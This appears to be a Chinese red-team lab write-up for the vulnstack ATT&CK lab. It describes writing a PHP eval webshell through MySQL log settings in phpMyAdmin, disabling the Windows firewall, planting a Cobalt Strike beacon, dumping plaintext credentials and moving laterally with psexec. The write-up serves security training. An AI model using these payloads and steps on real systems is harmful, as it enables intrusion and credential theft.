ATT&CK实战系列-红队实战(一)

admin 2025年2月17日13:33:44评论11 views字数 2019阅读6分43秒阅读模式
地址http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
ATT&CK实战系列-红队实战(一)

环境下载

下载靶场环境,并导入虚拟机分别是win2003、win7、winserver2008

ATT&CK实战系列-红队实战(一)

配置网络

虚拟机——编辑——虚拟机网络编辑器——添加网络VMnet2——仅主机模式分配的地址是192.168.52.0

ATT&CK实战系列-红队实战(一)

配置好地址后,需要将win2003和winserver2008的网卡设置为VMnet2

ATT&CK实战系列-红队实战(一)
ATT&CK实战系列-红队实战(一)

win7的网络需要两张,一张为VMnet2,一张为NAT(我这用的是台式机搭建靶场,笔记本作为攻击机,所以用的桥接网络)

ATT&CK实战系列-红队实战(一)

总结:win7为web服务器双网卡,通外网。win2003和2008为域内服务器。win7:192.168.0.105、192.168.52.143win2003:192.168.52.138win2008:192.168.52.141

外网渗透

1、已知目标的外网是192.168.0.1052、扫描ip的端口,获得80和3306端口。

ATT&CK实战系列-红队实战(一)

3、访问80端口获得phpstudy探针,获得绝对路径,探测出数据库弱口令

ATT&CK实战系列-红队实战(一)
ATT&CK实战系列-红队实战(一)
ATT&CK实战系列-红队实战(一)

4、扫描192.168.0.105的目录获得phpmyadmin目录

ATT&CK实战系列-红队实战(一)

5、访问phpmyadmin通过弱口令登录

ATT&CK实战系列-红队实战(一)
ATT&CK实战系列-红队实战(一)

6、通过日志写入webshellSHOW VARIABLES LIKE '%general%'   #查看日志

ATT&CK实战系列-红队实战(一)

set global general_log = "ON"     #开启日志记录

ATT&CK实战系列-红队实战(一)
ATT&CK实战系列-红队实战(一)

set global general_log_file = "D:/phpStudy/WWW/shell.php" #指定日志文件

ATT&CK实战系列-红队实战(一)
ATT&CK实战系列-红队实战(一)

select "<?php eval($_POST['123'])?>"     #写入webshell

ATT&CK实战系列-红队实战(一)

访问webshell

ATT&CK实战系列-红队实战(一)

使用蚁剑连接木马

ATT&CK实战系列-红队实战(一)

7、phpmyadmin的getshell方法

(1)Select into Outfile:这种方法涉及使用“SELECT … INTO OUTFILE”SQL语句    将webshell写入服务器上的文件。攻击者必须知道webroot的绝对路径并具有对该目录的写权限。          show global variables like '%secure%' #root权限、绝对路径、secure_file_priv没具体值          如果secure_file_priv的值为null,表示限制mysqld不允许导入或导出          如果secure_file_priv的值为某个具体的目录路径(例如/tmp/),表示限制mysqld的导入或导出只能发生在该目录下          如果secure_file_priv没有具体值,表示不对mysqld的导入或导出做限制在MySQL 5.5之前,secure_file_priv默认是空,这个情况下可以向任意绝对路径写文件。但在MySQL 5.5之后,secure_file_priv默认是NULL,这个情况下不可以写文件。

(2)日志文件操作:这种方法涉及操作MySQL日志文件以将webshell写入服务器上的文件。攻击者必须具有对日志文件目录的写权限并知道webroot的绝对路径           SHOW VARIABLES LIKE '%general%' #查看日志           set global general_log = "ON" #开启日志记录           set global general_log_file = "D:/phpStudy/WWW/1.php" #指定日志文件           select "<?php eval($_POST['123'])?>"    #写入webshell

以上所有方法都需要满足某些条件,例如具有写权限并知道webroot的绝对路径。

内网渗透

1、打开CS,生成监听器

ATT&CK实战系列-红队实战(一)

2、创建木马程序,将目标上线cs

ATT&CK实战系列-红队实战(一)

3、通过蚁剑将cs创建的木马上传

ATT&CK实战系列-红队实战(一)

4、启动木马,上线cs

ATT&CK实战系列-红队实战(一)

5、主机上线后

netsh advfirewall set allprofiles state off #关闭目标主机防火墙

ATT&CK实战系列-红队实战(一)

ipconfig    #查看信息,发现双网卡

ATT&CK实战系列-红队实战(一)

net user #查看用户

ATT&CK实战系列-红队实战(一)

提权

ATT&CK实战系列-红队实战(一)
ATT&CK实战系列-红队实战(一)

net view #查看计算机列表,并且会将其他计算机列入CS

ATT&CK实战系列-红队实战(一)
ATT&CK实战系列-红队实战(一)

net config Workstation #查看当前计算机名、域、登录域等

ATT&CK实战系列-红队实战(一)

net view /domain #查看域

ATT&CK实战系列-红队实战(一)

net localgruop administrators #查看域管

ATT&CK实战系列-红队实战(一)

net tasklist #查看进程列表,是否存在杀软

ATT&CK实战系列-红队实战(一)

net dclist #查看域控列表

ATT&CK实战系列-红队实战(一)

提取凭证

ATT&CK实战系列-红队实战(一)
ATT&CK实战系列-红队实战(一)

提取明文密码

ATT&CK实战系列-红队实战(一)

创建smb监听器

ATT&CK实战系列-红队实战(一)

psexec

ATT&CK实战系列-红队实战(一)

选择账号密码,监听器选择创建的smb,会话选择内网提权后的服务器

ATT&CK实战系列-红队实战(一)

获得一台服务器的权限后,再次获得另一个内网服务器的权限并上线

ATT&CK实战系列-红队实战(一)
ATT&CK实战系列-红队实战(一)

新网站

phpmyadmin中看到有特殊的数据库,并且在蚁剑也看到不同的目录

ATT&CK实战系列-红队实战(一)
ATT&CK实战系列-红队实战(一)

打开网站

ATT&CK实战系列-红队实战(一)

公告信息获得敏感信息

ATT&CK实战系列-红队实战(一)

打开后台弱口令登录

ATT&CK实战系列-红队实战(一)
ATT&CK实战系列-红队实战(一)

通过新建文件上传木马

ATT&CK实战系列-红队实战(一)
ATT&CK实战系列-红队实战(一)

在蚁剑获取到上传的目录

ATT&CK实战系列-红队实战(一)

访问木马

ATT&CK实战系列-红队实战(一)

连接木马

ATT&CK实战系列-红队实战(一)

原文始发于微信公众号(破晓信安):ATT&CK实战系列-红队实战(一)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年2月17日13:33:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ATT&CK实战系列-红队实战(一)https://cn-sec.com/archives/3751177.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息